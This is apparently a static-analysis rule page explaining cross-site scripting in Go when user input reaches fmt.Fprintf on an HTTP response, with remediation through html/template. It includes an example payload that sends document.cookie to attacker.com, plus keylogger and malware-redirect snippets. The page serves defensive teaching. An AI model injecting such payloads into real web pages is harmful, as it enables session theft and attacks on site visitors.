XSS via fmt.Fprintf to http.ResponseWriter

`fmt.Fprintf`, `fmt.Fprintln`, and `fmt.Fprint` write raw bytes to any `io.Writer`, including `http.ResponseWriter`. Unlike `html/template`, these functions perform **zero HTML escaping** — every character in the format arguments reaches the browser exactly as provided. When user-controlled data flows into these calls without prior escaping, attackers inject arbitrary HTML and JavaScript into the response. **Why fmt.Fprintf is particularly dangerous**: The Go standard library's deliberate division of responsibilities places HTML escaping in `html/template` and leaves `fmt` as a raw byte writer. Developers accustomed to server-side templating in other languages may not realize that `fmt.Fprintf(w, "<p>%s</p>", userInput)` is equivalent to `w.Write([]byte("<p>" + userInput + "</p>"))` — both write unescaped bytes. **XSS attack surface via fmt.Fprintf**: - "**Format string injection**: `fmt.Fprintf(w, userInput)` — if the user controls the format" string itself, `%!` verbs can cause unexpected behavior; HTML tags execute directly. - "**Format argument injection**: `fmt.Fprintf(w, \"<p>Hello %s</p>\", name)` — attacker sets" `name` to `<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>`. - "**Chained template fragments**: Building HTML by concatenating `fmt.Sprintf` results and" later writing the assembled string to the response — taint survives across the intermediate variable. - "**JSON responses with incorrect Content-Type**: `fmt.Fprintf(w, `{\"user\":\"%s\"}`, username)`" without setting `Content-Type: application/json` — browsers sniff the content and may render it as HTML if the response starts with `<`. **Content-Type sniffing**: Go's `net/http` calls `http.DetectContentType()` on the first 512 bytes of the response body if no explicit `Content-Type` header is set. A response starting with `{` or `[` gets `text/plain; charset=utf-8`; starting with `<` gets `text/html; charset=utf-8`. Setting the correct Content-Type header is a mitigation layer, but browsers with MIME type sniffing enabled (or `X-Content-Type-Options: nosniff` missing) may still execute injected scripts in `text/plain` responses when served inline. **Reflected vs. Stored XSS via fmt.Fprintf**: - "**Reflected**: The injected value comes from the current request (query param, form field," URL segment) and is immediately written to the response. The attacker crafts a malicious URL and tricks the victim into clicking it. - "**Stored**: The value was previously stored in a database and is now retrieved and written" with `fmt.Fprintf`. All visitors to the page receive the attack payload. Taint analysis must track the dataflow through the database query and result scanning. **Impact of XSS**: - Session hijacking via `document.cookie` theft (if `HttpOnly` flag is absent) - Keylogging by injecting `<script>document.onkeydown=function(e){...}</script>` - DOM manipulation to insert phishing content on a trusted domain - Browser-based cryptomining or botnet participation - Redirection to drive-by download pages via `window.location = "https://malware.example"` **Go-specific remediation path**: `html/template` is the authoritative solution — it performs context-aware escaping based on where the value appears (HTML body, attribute, URL, JavaScript string, CSS). `html.EscapeString()` handles the HTML body context but does not protect attribute values containing JavaScript event handlers or `href="javascript:..."` patterns.

Use Code Pathfinder to scan your codebase: pathfinder scan --ruleset golang/GO-XSS-002 --project .

This vulnerability is rated as HIGH severity.

Yes! Code Pathfinder allows you to customize rules. Modify detection patterns, adjust severity levels, add custom sanitizers, and configure the rule to fit your organization's security policies.